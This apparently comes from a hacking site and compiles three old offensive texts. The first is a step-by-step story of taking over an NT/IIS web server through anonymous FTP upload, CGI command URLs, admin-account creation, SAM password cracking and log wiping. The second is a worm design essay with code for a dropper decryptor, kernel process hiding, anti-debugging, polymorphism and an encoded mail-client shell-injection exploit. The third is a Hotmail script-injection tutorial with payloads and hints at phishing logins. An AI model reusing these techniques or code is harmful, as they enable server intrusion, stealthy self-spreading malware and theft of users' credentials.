Johnny Hacker has a Windows NT Server at home. Why? Because he knows if he’s going to hack NT he’s best using the same type of computer…it gives him all the necessary tools. He has installed RAS and has a dial-up connection to the Internet. One morning, around 2:00am he dials into the Internet…his IP address is dynamically assigned to him. He opens up a Command Prompt window and gets down to work. He knows www.company.com’s web server is running IIS. How? Because he once did a search on “batch fil es as CGI” using Excites search engine. That phrase is in Chapter 8 of Internet Information Server’s on-line help….and unfortunately it’s been indexed by Excite’s spider…now Johnny has a list of around 600 web servers running IIS.

He ftps to www.company.com. He isn’t even sure yet if the server is running the ftp service. He knows if he gets a connection refused message it wont be…he’s in luck though…the following appears on the screen:

C:\ftp www.company.com
Connected to www.company.com.
220 saturn Microsoft FTP Service (Version 3.0).
User (www.comapny.com:(none)):

This connection message tells him something extremely important : The NetBIOS name of the server : SATURN. From this he can deduce the name of the anonymous internet account that is used by NT to allow people to anonymously u se the WWW, FTP and Gopher services on the machine. If the default account hasn’t been changed, and he knows that it is very rare if it has been changed, the anonymous internet account will be called IUSR_SATURN. This information will be needed later if he’s to gain Administrator access to the machine. He enters “anonymous” as the user and the following appears:

331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

Johnny often tries the “guest” account before using “anonymous” as the user. A fresh install of NT has the “guest” account disabled but some admins enable this account….and the funny thing is they usually put a weak password on it such as ‘guest’ or no password at all. If he manages to gain access to the ftp service with this account he has a valid NT user account….everything that the “guest” account has access to…so does Johnny, and sometimes that can be almost everything. He knows he can access their site now…but there is still a long way to go yet….even at this point he still might not get access. At this point he doesn’t even supply a password…he just presses enter and gets a message stating that the Anonymous user is logged in.

First off he types “cd /c” because some admins will make the the root of the drive a virtual ftp directory and leave the default alias name : “/c”. Next he sees whether he can actually “put” any files onto the site ie. is the write permission enabled for this f tp site. He’s in luck. Next he types “dir” to see what he has access to. He chuckles to himself when he sees a directory called “CGI-BIN”. Obviously the Webmaster of the NT machine has put this here with the rest of the WWW site so he can remotely make changes to it. Johnny knows that the CGI-BIN has the “Execute” permission so if he can manage to put any program in here he can run it from his web browser. He hopes that the Webmaster hasn’t, using NTFS file-level security, cut off write access to the anonymous internet account to this directory…even though he knows there are sometimes ways round this. He changes to the CGI-BIN directory and then changes the type to I by using the command “binary”. Then he types “put cmd.exe”. He’s in luck..he gets the following response :

200 PORT command successful.
150 Opening BINARY mode data connection for CMD.EXE.
226 Transfer complete.
208144 bytes sent in 0.06 seconds (3469.07 Kbytes/sec)

Next he puts getadmin.exe and gasys.dll into the same directory. With these three files in place he doesn’t even gracefully “close” the ftp session; he just closes the Command Prompt window. With a smile on his face he leans back and lights a smoke, savouring the moment…he knows he has them…. After crunching the cigarette out in an overflowing ashtray he connects to AOL. He does this because if logging is enabled on the NT machine the IP address of AOL’s proxy server will be left and not his own…not that it really matters because soon he’ll edit the logfile and wipe all traces of his presence. Opening up the web browser he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?IUSR_SATURN

After about a fifteen second wait the following appears on his web browser:

CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. 

The headers it did return are:

Congratulations , now account IUSR_SATURN have administrator rights! 

He has just made the anonymous internet account a local administrator and consequently using this account he can do pretty much what he wants to. Firstly though, he has to create an account for himself that he can use to connect to the NT server using NT Explorer and most of the Administrative tools. He can’t use the IUSR_SATURN account because he doesn’t know the randomly generated password. To create an account he enters the following URL:

cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20cnn%20news%20/add

He has just created an account called “cnn” with the password “news”. To make the account a local administrator he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?cnn

It has taken him less than ten minutes to do all of this. He disconnects from AOL and clicks on start, goes upto find and does a search for the computer www.company.com. After about a minute the computer is found, next he right clicks on the “computer” and then clicks on Explore. NT Explorer opens and after a little wait Johnny is prompted for a user-name and password. He enters “cnn” and “news”. Moments later he is connected. Admin rights for the computer www.company.com are appended to his own security access token…now he can do anything. Using User Manager for Domains he can retrieve all the account information; he can connect to the Internet Service Manager; he can view Server Manager…first though, using NT Explorer he maps a drive to the hidden system share C$. He changes to the Winnt\system32\logfiles directory and opens up the logfile for that day. He deletes all of the log entries pertaining to his “visit” and saves it. If he gets any message about sharing violations all he has to do is change the date on the computer with the following URL:

http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98

Next, using the Registry Editor he connects to the registry on the remote computer. Then using L0phtcrack he dumps the SAM (the Security Accounts Manager – holds account info) on the NT server and begins cracking all the passwords on the machine. Using the Task Manager he sets the priority to Low because L0phtcrack is fairly processor intensive (NB L0phtcrack ver 2.0 sets the priority to Low anyway) and there is still a few thing he must do to hide the fact that that some-one has gained entry. He deletes cmd.exe, getadmin.exe and gasys.dll from the cgi-bin, then he checks the security event log for the remote NT server using Event Viewer to see if he’s left any traces there.

Finally using User Manager for Domains he removes admin rights from the IUSR_SATURN account and deletes the cnn account he created a few moments earlier. He doesn’t need this account anymore….L0phtcrack will be able to brute force all the accounts. Next time he connects to this machine it will be using the Administrator account. He breaks his connection to the Internet and sets L0phtcrack’s priority to High, leaves it running and heads to bed…Looking at his alarm clock : it’s just passed 2:30am….Sighing to himself, he mumbles, “Sheesh, I’m getting slow!” and falls asleep with a grin on his face.

The original filename was ntremote.txt – Author Unknown

Media, kindly supported by AV “experts”, drawn apocalyptical vison of desctruction caused by stupid M$ Outlook / VisualBasic worm, called “ILOVEYOU”. Absurdal estimations – $10M lost for “defending the disease”, especially when you take a look at increasing with the speed of light value of AV companies market shares, made many people sick. Lame VBS application that isn’t even able to spread without luser click-me interaction, and is limited to one, desk-end operating system… Worm that sends itself to people in your addressbook, and, in it’s original version, kills mp3 files on your disk [1].

And you call it dangerous? Stop kidding.

Over year ago, with couple of friends, we started writing a project, called ‘Samhain’ (days ago, on packetstorm, I noticed cute program with same name – in fact it’s not the same app, just a coincidence . We wanted to see if it’s difficult to write deadly harmful Internet worm, probably much more dangerous than Morris’s worm. Our goals:

• 1: Portability – worm must be architecture-independent, and should work on different operating systems (in fact, we focused on Unix/Unix-alikes, but developed even DOS/Win code).
• 2: Invisibility - worm must implement stealth/masquerading techniques to hide itself in live system and stay undetected as long as it’s possible.
• 3: Independence – worm must be able to spread autonomically, with no user interaction, using built-in exploit database.
• 4: Learning – worm should be able to learn new exploits and techniques instantly; by launching one instance of updated worm, all other worms, using special communication channels (wormnet), should download updated version.
• 5: Integrity – single worms and wormnet structure should be really difficult to trace and modify/intrude/kill (encryption, signing).
• 6: Polymorphism – worm should be fully polymorphic, with no constant portion of (specific) code, to avoid detection.
• 7: Usability – worm should be able to realize choosen mission objectives – eg. infect choosen system, then download instructions, and, when mission is completed, simply disappear from all systems.

With these seven simple principles, we started our work. This text describes our ideas, concepts and implementation issues. It is NOT the terrorist’s handbook, and has not been written to help people to write such piece of code on their own. It’s written to show that very serious potential risk, which we virtually can’t avoid or stop, isn’t only hypotetical. Code provided here is partial, often comes from first, instead of most recent, Samhain release and so on. But remember – working model has been written. And this model is deadly dangerous engine, which can be used to very, very bad things. Probably we aren’t the first people who thought about it and tried to write it, that’s what make us scared…

Winter 1998, three bored people somewhere in the middle of Europe.

Sit and relax.

0×01: Portability

This is probably the most important thing – we don’t want code that can run only on Windows, Linux or Solaris, or – worse – can run only on x86. The task is quite easy to complete if you decide to spread your code in platform-independent form. How could it be achieved? Well, most of systems have C compiler So we might spread worm in source code, with simple decryptor (let’s say it will be shell script).

But wait, some (not much) systems don’t have C compiler. What can we do? Using wormnet, worm during infection might ask other wormnet members for compiled binary for given platform. Wormnet details have been described in section 0×04. Anyway, binary will contain appended source code, to make futher infections possible within standard procedure. Infection scheme is described in section 0×03.

First version of our decryptor looked like this:

const char decryptor[]="#!/bin/bash\nX=/tmp/.$RANDOM$$\n(dd if=\"$0\" of="
"$X.f~ ibs=1 skip=\x01\x01\x01\x01 count=\x02\x02\x02\x02\x02\x02 ;dd if="
"\"$0\" of=$X.b~ ibs=\x03\x03\x03\x03\x03 skip=1;echo \"int x;main(int c,"
"char**v){char a[99999];int i=read(0,a,99999);for(;x$X.d~;
test -x /tmp/.a012382~||cc -x c $X.d~-o/\tmp/."
"a012382~;/tmp/.a012382~ \x04\x04\x04 <$X.f~>$X.gz~;gzip -cd <$X.gz~>$X.c"
"~;rm -f $X.f~ $X.d~;cc -O3 -x c $X.c~ -o $X~;chmod 755 /tmp/.a012382~)&>"
"/dev/null;test -x \"$0\"&&exec $X~ \"$0\" $@\n";

It used very simple (per-byte increments) “encryption” for source code with custom increment value (decryptor has been modified accordingly to choosen value – \x01, \x02, \x03 and \x04 are changed by encryptor routine). Also, this constant decryptor has been every time re-written using simple polymorphic engine (see section 0×06) to avoid constant strings. Later, we modified encryption routine to something little bit stronger (based on logistic equation number generator in chaotical window) – in fact, it only makes it more difficult to detect in inactive form.

As you can see, this decryptor (or it’s early version shown above) isn’t highly-portable – what if we don’t have bash, compiler, gzip or such utilities? Well, that’s one of reasons we’ve decided to join worms in wormnet – if sent code won’t connect back to parent and report itself, host is not marked as infected, and wormnet is asked for pre-compiled binary for given architecture (assuming we already infected this architecture somewhere in the world, and we had needed utilities, or we’re running the same architecture as infected host).

NOTE: For writing extremely ugly code that can run in DOS, [ba]sh, csh, perl etc and can be compiled with C in the same time, please refer IOCCC archives [2].

Sebastian wrote virus code that can spread both on Windows/DOS platform with C compiler and Unix systems with no modifications nor any interaction. It does cross-partition infections and installs itself as compiler trojan (modifying include files to put evil instructions in every compiled source). It is called Califax and has been developed while writting Samhain, as an excercise to prove that such cross-system jumps are possible. I don’t want to include Sebastian’s sources with no permission, all I want to say
is he did it within 415 lines of c code Califax hasn ‘t been incorporated within Samhain project, as we don’t want to infect Winbloze for ideological reasons

0×02: Invisibility

After breaking into remote system, worm not always have root privledges, so first of all, we wanted to implement some techniques to hide it, make it look-like any other process in system, and make it hard to kill until there’s a chance to gain higher privledges (for details on system intrusion, please refer section 0×03). Also, we made sure it’s really hard to debug/trace running or even inactive worm – please refer section 0×05 for anti-debug code details.

Our non-privledged process masquerading code consists of following parts:

• - masquerading: walk through /proc, choose set of common process names and
  change your name to look just like one of them,
• - cyclic changes: change your name (and executable name) as well as pid
  frequently; while doing it, always keep ‘mirror’ process, in case parent
  or child get killed by walking skill-alike programs

Our goal is to make almost impossible (with common tools) to ‘catch’ process, as all /proc parameters (pid, exe name, argv[0]) are changing, and even if one of them is catched, we have ‘mirror’ project. Of course, at first we should avoid such attempts by camouflage. This comment comes from libworm README for Unices:

– snip from README –

a) Anti-scanning routines

Following routines are provided to detect anti-worm stuff, like ‘kill2′
or anything smarter. You should use them before fork()ing:

int bscan(int lifetime);

bscan performs ‘brief scanning’ using only 2 childs. Lifetime should
be set to something about 1000 microseconds. Return values:
0 – no anti-worm stuff detected, please use ascan or wscan.
1 – dumb anti-worm stuff detected (like ‘kill2′); use kill2fork()
2 – smart (or brute) stuff detected, wait patiently

int ascan(int childs,int lifetime);

ascan performs ‘advanced scanning’ using given number of childs
(values between 2 and 5 are suggested). It tests environment
using ‘fake forkbomb’ scenario. Results are more accurate:
0 – no anti-worm stuff detected (you might use wscan())
1 – anti-worm stuff in operation

int wscan(int childs,int lifetime);

wscan acts like ascan, but uses ‘walking process’ scenario. It
seems to be buggy, accidentally returning ‘1′ with no reason,
but it’s also the best detection method. Return values:
0 – no anti-worm stuff detected
1 – anti-worm stuff in operation

int kill2fork();

This is aletrnative version of fork(), designed to fool
dumb anti-worm software (use it when bscan returns 1).
Return value: similar as for fork().

b) Masquerading routines

These routines are designed to masquerade and hide current
process:

int collect_names(int how_many);

collect_names builds process names table with up to
‘how_many’ records. This table (accessible via
‘cmdlines[]‘ array) contains names of processes in
system; Return value: number of collected items.

void free_names();

this function frees space allocated by collect_names
when you don’t need cmdlines[] anymore.

int get_real_name(char* buf, int cap);

this function gets real name of executable for current
process to buf (where cap means ‘maximal length’).

int set_name_and_loop_to_main(char* newname,char* newexec);

this function changes ‘visible name’ of process to newname
(you may select something from cmdlines[]), then changes
real executable name to ‘newexec’, and loops to the
beginning of main() function. PID will be NOT changed.
Set ‘newexec’ to NULL if you don’t want to change real exec
name. Return value: non-zero on error.

Note: variables, stack and anything else will be reset. Please
use other way (pipes, files, filenames, process name) to
transfer data from old to new executable

int zero_loop(char* a0);

this function returns ‘1′ if this main() code is reached for
the first time, or ‘0′ if set_name_and_loop_to_main() was
used. Pass argv[0] as parameter. It simply checks if
real_exec_name is present in argv[0].

For more details and source code on architecture-independent non-root process hiding techniques, please refer libworm sources [3] (incomplete for now, but always something).

This routines are weak and might be used only for short-term process hiding. We should as fast as possible gain root access (again, this aspect will be discussed later). Then, we have probably the most complex aspect of whole worm. Advanced process hiding is highly system-dependent, usually done by intercepting system calls. We have developed source for universal hiding modules on some systems, but it not working on every platform Samhain might attack. Techniques used there are based on well-known kernel file and process hiding modules.

Our Linux 2.0/2.1 (2.2 and 2.3 kernels weren’t known at the time our module used technique later described in “abtrom” article on BUGTRAQ by (Sat, 28 Aug 1999 14:40:31) to intercept syscalls [4]. Sebastian wrote stealth file techniques (to return original contents of eventually infected files), while I developed process hiding and worm interface. Module intercepted open, lseek, llseek, mmap, fstat, stat, lstat, kill, ptrace, close, read, unlink, write and execve calls.

For example, new llseek call look this way:

int new_llseek(unsigned int fd,unsigned int offset_high,
               unsigned int offset_low,int *result,unsigned int whence) {
  retval=old_llseek(fd,offset_high,offset_low,result,whence);
  if (retval<0) return retval;
  if (!(file=current->files->fd[fd])) return retval;
  if (S_ISREG(file->f_inode->i_mode) || S_ISLNK(file->f_inode->i_mode))
    if (is_happy(fd) && file->f_pos < SAMLEN) file->f_pos += SAMLEN;
  return retval;
}

In this case, we wanted to skip samhain code loader at the beginning of file. is_happy() function has been used to identify infected files. Unfortunately, it also has to check length of this loader – remember, it’s dynamically generated. This is code from is_happy() used to determine this size from our decryptor routine:

    // Determine where ELF starts...
    file->f_pos=0;
    BEGIN_KMEM
    r=file->f_op->read(file->f_inode, file, buf,sizeof(buf));
    END_KMEM
    // Groah! We have to write out own atoi... Stupido 
    znaki=0;
    while (znaki!=TH && ++v9) { znaki=1;break; } // Format error (!)
        SAMLEN+=(buf[v+poz++]-'0')*mult;
        mult=mult/10;
      }

Worm isn’t spreading across the filesystem widely, so the problem doesn’t affect many files – only some executables called in boot process – to make sure we’re always resident. Process hiding is quite generic:

int new_ptrace(int req,int pid,int addr,int dat) {
  x=0;
  buf[20]=0;
  sprintf(b,"/proc/%d/cmdline",pid);
  if (active)
    BEGIN_KMEM
    x=old_open(b,O_RDONLY,0);
    END_KMEM
  if (x>0) {
    BEGIN_KMEM
    read(x,b,1);
    END_KMEM
    close(x);
    if (!b[0]) return -ESRCH;
  }
  return old_ptrace(req,pid,addr,dat);
}

Also, we have to hide active network connections for wormnet and sent/received wormnet packets to avoid detection via tcpdump, sniffit etc.

That’s it, nothing uncommon. Similar code has been written for some other platforms. See my AFHaRM or Sebastian’s Adore modules for implementation of stealth techniques [5].

0×03: Independence + 0×04: Learning

Wormnet. The magic word. Wormnet is used to distribute upgraded Samhain modules (eg. new exploit plugins), and to query other worms for compiled binaries. Communication scheme isn’t really difficult, using TCP streams and broadcast messages within TCP streams. Connections are persistent. We have four types of requests:

• - infection confirmation: done simply by connecting to parent worm
  if infection succeded (no connection == failure),
• - update request: done by re-infecting system (in this case, already installed
  worm verifies signature on new worm when receiving request, then swaps
  process image by doing execve() if requesting binary has newer timestamp),
  then inheriting wormnet connections table and sending short request to
  connected clients, containing code timestamp.
• - update confirmation: if timestamp sent on update request is newer than
  timestamp of currently running worm, it should respond with ‘confirmation’,
  then download new code via the same tcp stream; then, it should verify
  code signature, and eventually swap it’s process image with new exec, then
  send update request to connected worms.
• - platform request: by sending request to every connected worm (TTL
  mechanism is in use) describing machine type, system type and system
  release, as well as IP and port specification; this request is sent
  (with decreased TTL) to other connected wormnet objects, causing
  wormnet broadcast; first worm that can provide specific binary, should
  respond connecting to given IP and port, and worm that sent platform
  request should accept it (once). Any futher connects() (might happen
  till TTL expiration) should be refused. After connecting, suitable
  binary should be sent, then passed to infection routines. Worm should
  try first with TTL approx 5, then, on failure, might increase it by 5
  and retry 3-5 times, we haven’t idea about optimal values.

Packets are “crypted” (again, nothing really strong, security by obscurity) with key assigned to specific connection (derived from parent IP address passed on infection). Type is described by one-byte field, then followed by size field and RAW data or null-terminated strings, eventually with TTL/timestamp fields (depending on type of message).

Wormnet connections structure looks arbitrary and is limited only by max per-worm connections limit. Connections are initiated from child to parent worm, usually bypassing firewall and masquerading software.

On infection, short ‘wormnet history’ list is passed to child. If parent has too many wormnet connections at time, and refuses new connection, child should connect to worm from the history list.

         3
          |
          |
  3 ----- 2 ---- 3 ----- 4 ------- 5 ------- 6
  |     /        |                 |
  |   /          |                 |
  | /            |                 |		Possible wormnet structure.
  1 ------------ 2 ----- 3         6		Numbers represent infection
    \                  /			order. Bottom "3" couldn't
      \              /				for some reason connect to
        \          /                            it's parent and choosen
          \ ---- 3 ------ 4                     "1" from 'history list'.
                 |
                 |
                 |
                 4

What about exploits? Exploits are modular (plugged into worm body), and divided in two sections – local and remote. We wanted to be platform independent, so we focused on filesystem races, bugs like -xkbdir hole in Xwindows, and inserted just a few buffer overflows, mainly for remote intrusion (but we decided to incorporate some bugs like remote pine mailcap exploit and so on… Code was kind of shell-quoting masterpiece

Pine mailcap exploit (it has been already fixed after my BUGTRAQ post, but in late 1998 it was something new and nice):

fprintf(f,"From: \"%s\" <%s@%s>\n",nam,us,buf2);
fprintf(f,"To: \n",hostname);
fprintf(f,"Subject: %s\n",top);
fprintf(f,"MIME-Version: 1.0\n");
fprintf(f,"Content-Type: multipart/mixed;\n");
fprintf(f,"\tboundary=\"----=_NextPart_000_0007_01BD5F09.B6797740\"\n\n");
fprintf(f,"------=_NextPart_000_0007_01BD5F09.B6797740\n");
fprintf(f,"Content-Type: default/text;\n\t");

fprintf(f,"\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x5c\x5c\x5c\x22\x78\x5c"
        "\x5c\x5c\x22\x5c\x20\x3d\x3d\x5c\x20\x5c\x5c\x5c\x22\x78\x5c\x5c"
        "\x5c\x22\x5c\x20\x5c\x29\x5c\x20\x73\x68\x5c\x20\x2d\x63\x5c\x20"
        "\x65\x63\x68\x6f\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x66\x6f\x72"
        "\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x69\x5c\x24\x5c\x49\x46\x53"
        "\x5c\x5c\x5c\x69\x6e\x5c\x24\x5c\x49\x46\x53\x5c\x60\x6c\x73\x5c"
        "\x24\x49\x46\x53\x2f\x74\x6d\x70\x2f\x5c\x60\x5c\x24\x5c\x49\x46"
        "\x53\x5c\x5c\x5c\x3b\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x64\x6f"
        "\x5c\x24\x5c\x49\x46\x53\x5c\x5c\x5c\x73\x68\x5c\x24\x5c\x49\x46"
        "\x53\x5c\x5c\x5c\x2f\x74\x6d\x70\x2f\x5c\x5c\x5c\x24\x69\x5c\x24"
        "\x5c\x49\x46\x53\x5c\x5c\x5c\x3b\x64\x6f\x6e\x65\x26\x3e\x2f\x74"
        "\x6d\x70\x2f\x2e\x4b\x45\x57\x4c\x3b\x5c\x73\x68\x5c\x24\x49\x46"
        "\x53\x5c\x5c\x5c\x2f\x74\x6d\x70\x2f\x2e\x4b\x45\x57\x4c\x22\x0A");

// 'encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ sh\ -c\ echo\$\IFS\\\for'
// '\$\IFS\\\i\$\IFS\\\in\$\IFS\`ls\$IFS/tmp/\`\$\IFS\\\;\$\IFS\\\do'
// '\$\IFS\\\sh\$\IFS\\\/tmp/\\\$i\$\IFS\\\;done&>/tmp/.KEWL;\sh\$IF'
// 'S\\\/tmp/.KEWL"'

Message body contained code to be executed (shell-script to connect, download and run worm, then kill any evidence). Yes, this exploit sucks – as it required some kind of user interaction (reading e-mail), but is just an example.

Both remote and local exploits are sorted by effectiveness. Exploits that succed most of the time are tried first. Less effective ones are moved at the end. This list is inherited by child worms.

Oh, spreading. Victims are choosen by monitoring active network connections. With random probability, servers are picked from this list and attacked. In case of success, server is added to ‘visited’ list – these are not attacked anymore. In case of failure, server is not attacked until new version of worm is uploaded. Of course, internal servers list is finite and sometimes server might be attacked again (if it’s not our child and it isn’t currently connected), but who cares, attempt will be ignored or upgrade procedure will happen, depending on timestamps.

This code is used to qualify host (obtained from network stats):

void infect_host(int addr) {
  struct hostent* h;
  int (*exp)(char*);
  int i=0,n=0,max=VERY_SMALL;
  if ((0x7F & addr)==0x7F) return;      // do not touch 127.* subnet 
  h=gethostbyaddr((void*)&addr,4,AF_INET);
  if (is_host_happy(h->h_name)) return; // In wormnet?
  for (i=0;remote[i].present;i++) remote[i].used=0;
  while ((max=VERY_SMALL)) {
    n=-1;
    for (i=0;remote[i].present;i++)
      if (!remote[i].used && remote[i].hits>=max) { max=remote[i].hits;n=i; }
    if (n<0) break;
    exp=remote[n].handler;
    remote[n].used=1;
    current_module=n;
    remote[n].hits+=(i=exp(h->h_name));
    if (i>0) break;
  }
}

0×05: Integrity

The most important thing in worm’s life is not to get caught. We have to be sure it’s not easy to trace/debug us – we want to make reverse-engineering even harder. We don’t want to expose our internal wormnet protocols, communication with kernel module and detection techniques used by worms to check for themselves, etc. Four things:

• - hide everything: see section 0×02.
• - hash, crypt, scramble: see sections 0×01, 0×04.
• - don’t let them caught you: see section 0×02.
• - avoid debugging even if we cannot hide!

We used several anti-debugger techniques, including application-dependent (bugs in strace on displaying some invalid parameters to syscalls, bugs in gdb while parsing elf headers, ommiting frame pointer, self-modyfing code and so on), as well as some universal debugger-killer routines called quite often (they aren’t really time-expensive). This is one of them:

void kill_debug(void) {
  int x,n;
  n=getppid();
  if (!(x=fork())) {
    x=getppid();
    if (ptrace(PTRACE_ATTACH,x,0,0)) {
      fprintf(stderr,
          "\n\n\n*****************************************\n"
                "*** I REALLY DO NOT LIKE TO BE TRACED ***\n"
                "*****************************************\n\n\n");
      ptrace(PTRACE_ATTACH,n,0,0);
      kill(x,9);
    }
    usleep(1000);
    ptrace(PTRACE_DETACH,x,0,0);
    exit(0);
  }
  waitpid(x,&n,0);
  return;
}

As I told before, worm modules were signed. First, using simple signatures, then using simple private key signing (not really difficult to crack, as key was relatively short, but for sure too difficult for amateurs). This made us sure we’re going to replace our worm image with REAL worm, not dummy anti-worm flare.

0×06: Polymorphism

Polymorphic engine was quite simple – designed to make sure our decryptor will be different every time. As it has been written in shell language, it was pretty easy to add bogus commands, insert empty shell variables, add \ and break contents, or even replace some parts with $SHELL_VARIABLES declared before. Getting original content is not quite easy, but of course, all you have to do is to imitate shell parsing of this decryptor to get original contents, then you’ll be able to identify at least some common code.

Code adding \ to decryptor looks like:

while (decryptor[x]) {
    switch (decryptor[x]) {
      case ' ':
        if (!rnd(2)) buf[y++]=' '; else goto difolt;
        break;
      case '\n':
        if (!you_can) you_can=1;
      default:
      difolt:
        if ((you_can && you_can++>1) && !rnd(10) && decryptor[x]>5 &&
             decryptor[x]!='>' && decryptor[x]!='<' && norm>2) {
          buf[y++]='\\';buf[y++]=10;norm=0;
        } else {buf[y++]=decryptor[x++];norm++;}
    }
  }

0×07: Usability

It’s stupid to launch worm designed eg. to steal secret information from specific host, because we have no idea if it will work fine, and won’t be caught. If so, it might be debugged (it’s made to be hard to debug, but, as every program, it’s not impossible to do it, especially if you’re able to separate worm code). Instead, we should be able to release ‘harmless’ worm, then, when we’re sure it accessed interesting host and haven’t been caught, we might send an update, which will try to reach destination worm, replace it with our evil code, then shut down every worm it can access via wormnet (by sending signed update, that will send itself to other worms, then shut down).

Maybe it isn’t the perfect solution, but in fact it’s probably much safer than inserting even generic backdoor code by default.

0×08: What happened then?

That’s it, the Samhain project, fit into approx. 40 kB of code. What happened to it? Nothing. It hasn’t been ever released, and I never removed restrictions from lookup_victim() and infect_host() routines. It’s still lying on my hard drive, getting covered with dust and oblivion, and that’s extacly what we wanted.

I stopped developing new code and testing it in January, 1999, with Samhain 2.2 and approx. 10000 lines of code. Wojtek Bojdol has been developing his much more advanced wormnet and system infection/monitoring code till February or March, but I haven’t found enough time to incorporate his sources within mainstream source tree. Then, we removed our repository from networked server we used to exchange ideas. I gradually published some bugs used in exploit database to BUGTRAQ, some of them (especially those not discovered by me) we kept for ourselves.

The story ends. Till another rainy day, till another three bored hackers.

You may be sure it will happen. The only thing you can’t be sure is the end of next story.

0×09: References

[1] ILOVEYOU worm:
Dramatical headlines:
+ http://www.cnn.com/2000/TECH/computing/05/04/iloveyou.03/
Technical analysis:
+ http://www.securityfocus.com/templates/article.html?id=30
Source of “ILOVEYOU” worm:
+ http://packetstorm.securify.com/viral-db/love-letter-source.txt

[2] International Obfuscated C Code Contest archives:
+ http://www.ioccc.org

[3] Libworm – unprivledged process hiding techniques:
+ http://lcamtuf.na.export.pl/pliki/libworm.tgz

[4] “yet another article about stealth modules in linux”
+ http://www.securityfocus.com

[5] Advanced File Hide and Redirect Module (in fact, old and lame
+ http://lcamtuf.na.export.pl/pliki/afharm.zip
Adore
+ ???

Again this is an old article but it’s a good one, written by Michal Zalewski and edited by Darknet

“pleez, pleez, PLEEZ teach me how to hack a Hotmail Account!!!”
-unidentified IRC user

From here on in you walk alone. Neither little_v OR Black Sun Research Facility AND its members will be responsible for what you do with the information presented here. Do not use this information to impress your “l33t0_b0rit0″ friends. Do not operate in shower. Objects in article may be closer than they appear.

Note: If you see (x), where x is a number, it means that this term is defined at (x) at the bottom of this article.

Intro

The purpose of this article is NOT, I repeat, NOT to teach someone how to “hack an email account”. It’s true purpose is actually MUCH more devious. The purpose of this and all other articles in the “An Exploit Explained: ” series is to teach readers about various web technologies, and the basics of security and exploiting. I will try to give you a hands-on, learn as you go type of education in computer security. Sound good??? Then let’s get in to it!!

Preface

On Wednesday, Sept. 22 1999, yet another bleary day in the life of little v, the following message was sent to my inbox:

To: BugTraq
Subject: Yet another major Hotmail security hole -
injecting JavaScript using "javasCript:"
Date: Wed Sep 22 1999 10:48:04
Author: Georgi Guninski
Message-ID: <37E8D004.EF848F34@nat.bg> 

Yet another major Hotmail security hole - injecting
JavaScript using "javasCript:"

There is a major security flaw in Hotmail which allows
injecting and executing JavaScript code in an email
message using the javascript protocol. This exploit
works both on Internet Explorer 5.0 (guess IE 4.x)
and Netscape Communicator 4.x. Hotmail filters the
"javascript:" protocol for security reasons. But it
does not filter properly the following case:
"javasCript:" where "C" is the ASCII code of "C".

So the following HTML is executed <IMG
SRC="javasCript:alert('JavaScript is executed');">
if the user has enabled automatically loading of
images (most users have).

Probably this may be used in other HTML tags.

Executing JavaScript when the user opens Hotmail
email message allows for example displaying a fake
login screen where the user enters his password
which is then stolen. I don't want to make a scary
demonstration, but I am sure it is also possible to
read user's messages, to send messages from user's
name and doing other mischief. Hotmail deliberately
escapes all JavaScript (it can escape) to prevent such
attacks, but obviously there are holes. It is much
easier to exploit this vulnerability if the user uses
Internet Explorer 5.0. AFAIK this is not a browser
problem, it is Hotmail's problem.

Workaround: Disable JavaScript

The code is:

<IMG SRC="javasCript:alert('JavaScript is
executed');a=window.open(document.links[2]);setTimeout('alert(\'The
first message in your Inbox is from :
\'+a.document.links[26].text)',20000)">
....
<snip>
....
Regards,
Georgi Guninski
http://www.securityfocus.com/external/http://www.nat.bg/~joro

Ok, don’t puke, I’m going to explain what just happened in a fashion that even your dog can understand.

What is this all about?

This important part of this posting to the Bugtraq(1) (http://www.securityfocus.com) mailing list is the actual exploit(2).
The exploit would be:

<IMG SRC=”javasCript:alert(’JavaScript is
executed’);a=window.open(document.links[2]);setTimeout(’alert(\’The
first message in your Inbox is from :
\’+a.document.links[26].text)’,20000)”>

What does it do?

As this exploit, when put into an email message sent to a hotmail user, opens a little box using the “alert()”(3) function in javascript(4), and is also supposed to read who the first message in your inbox is from. However, this code does not work on its own. You see, the email also says that you need to use the ASCII(5) code for “C” in the message. If I get out my handy HTML reference book, I can see that the ASCII code is C. If we substitute this into our little exploit, minus the “read who the first message in your inbox” part, we get this:

<IMG SRC=”javasCript:alert(’JavaScript is executed’)”>

How does it work?

Finding out how an exploit works is always the part that makes people a bit spindizzy. If we look at that gibberish we call code one more time we can see that it uses an <IMG> tag, which all you who took my HTML tutorial would know is to display an image onto the page. Because hotmail tries to be the “top dog” webmail provider, they allow you to set autoloading of images, so the image just shows up on the same page as the mail. When you open a new hotmail account, this option is already set (hurray!). The conflict happens because your normal browser allows you to put javascript tags into your IMG tags. Because JavaScript is a strong little language, and allows just about full control over someone’s browser, if the conditions are right. Naturally, people like you and me started exploiting hotmail’s allowing of javascript. Soon, the <SCRIPT> tag (the normal way to add javascript to a page) was banned from use in hotmail messages by way of filtering(6) (boo! hiss!). So normal guys like you and me had to “inject”, or put into other html tags, our javascript exploits. The IMG tag is perfect for this, when combined with it’s autoloading capabilities. This discovery led to the filtering, yet again, of javascript injected into IMG tags. Of course, hackers ALWAYS find a way, and today we combine IMG-injecting with ASCII tags to give you the current exploit.

What else can I do with this hole in Hotmail’s Security?

As is the case with many exploits, the sky is the limit. If you know javascript, you can pretty much have a field day with this exploit. If you don’t, here’s a few more snippets of code to get you started:

This code opens a window with Darknet’s main page in it when the hotmail user opens your mail:

<IMG SRC=”javasCript:window.open(’http:://www.darknet.org.uk’)”>

Note that the above code could point to any page at all (even one that simulates hotmail’s “you have been logged out” screen. *wink* *wink* HINT HINT )

This code opens 100 windows with Darknet’s main page in it (tee hee! self promotion is good!):

<IMG SRC=”javasCript:for(var i = 0; i < 100; i++) window.open(’http:://www.darknet.org.uk’);”>

